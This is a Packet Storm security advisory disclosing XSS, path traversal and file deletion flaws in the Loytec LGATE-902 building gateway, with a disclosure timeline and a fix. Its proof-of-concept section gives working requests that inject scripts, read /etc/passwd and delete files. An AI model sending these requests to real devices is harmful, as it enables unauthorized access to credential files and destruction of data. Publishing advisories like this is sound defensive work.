what you don't know can hurt you

Loytec LGATE-902 XSS / Traversal / File Deletion

Loytec LGATE-902 XSS / Traversal / File Deletion
Posted Apr 9, 2019
Authored by Daniel Ricardo dos Santos

Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities.

tags | exploit, arbitrary, vulnerability, xss, file inclusion
advisories | CVE-2018-14916, CVE-2018-14918, CVE-2018-14919
MD5 | bf196a89942c4e399ed9ea256488aabb

Loytec LGATE-902 XSS / Traversal / File Deletion

Change Mirror Download
INFORMATION

Product: Loytec LGATE-902 (https://www.loytec.com/)
Affected versions: < 6.4.2 (tested on version 6.3.2)
CVE IDs: CVE-2018-14919 (Stored and reflected XSS), CVE-2018-14918 (Path
traversal), and CVE-2018-14916 (Arbitrary file deletion).
Remote-exploit: yes

TIMELINE

Vendor notification: 26th July, 2018
Vendor acknowledgment: 1st August, 2018
Patch available: 13th November, 2018
Public disclosure: 7th April, 2019

INTRODUCTION

The LGATE-902 Gateway is a powerful gateway that can host user specific
graphical pages. The gateways provide connectivity functions to concurrently
integrate CEA-709 (LonMark Systems), BACnet, KNX, Modbus, and M-Bus. Local
operation and override is provided by the built-in jog dial and the backlit
display (128x64 pixels). Device and data point information is provided by the
Web interface and shown on the display via symbols and in text format.
(Description from: https://www.loytec.com/products/gateways/2259-lgate-902)

The three vulnerabilities described below affect the web application that runs
in the gateways and that is used to manage them.

VULNERABILITIES DESCRIPTION

The XSS vulnerability (CVE-2018-14919) allows an attacker to inject malicious
scripts into the trusted web interface running on a vulnerable device. The
scripts may be executed by the browser of an unsuspecting device administrator
to access session tokens or other sensitive information, as well as to perform
malicious actions on behalf of the user (e.g., internal network discovery and
traffic tunneling using BeEF).

Reflected XSS PoC (show alert dialog):
http://<device_address>/webui/data/alarm_log_obj?handle=1000%27-alert(1)-%27&page=0

Stored XSS PoC (show alert dialog):
POST http://<device_address>/webui/config/doc/action save=1&update=1&data=[["test","</script><script>alert(1);</script>",2]]

The path traversal (CVE-2018-14918) and file deletion (CVE-2018-14916)
vulnerabilities allow an attacker to manipulate path references and access or
delete files and directories (including critical system files) that are stored
outside the root folder of the web application running on the device. This can
be used to read or delete system and configuration files containing, e.g.,
usernames and passwords.

Path traversal PoC (read /etc/passwd):
http://<device_address>/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152

File deletion PoC (delete ../test.txt):
POST http://<device_address>/webui/config/doc/action
delete=1&update=1&name=../test.txt

SOLUTION

Update to version 6.4.2
WARNING - CONFIDENTIAL INFORMATION:
________________________________
The information contained in the e-mail may contain confidential and privileged information and is intended solely for the use of the intended recipient(s). Access for any review, re-transmission, dissemination or other use of, or taking of any action in regard and reliance upon this e-mail by persons or entities other than the intended recipient(s) is unauthorized and prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message and any attachments.


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    3 Files
  • 18
    Nov 18th
    22 Files
  • 19
    Nov 19th
    16 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close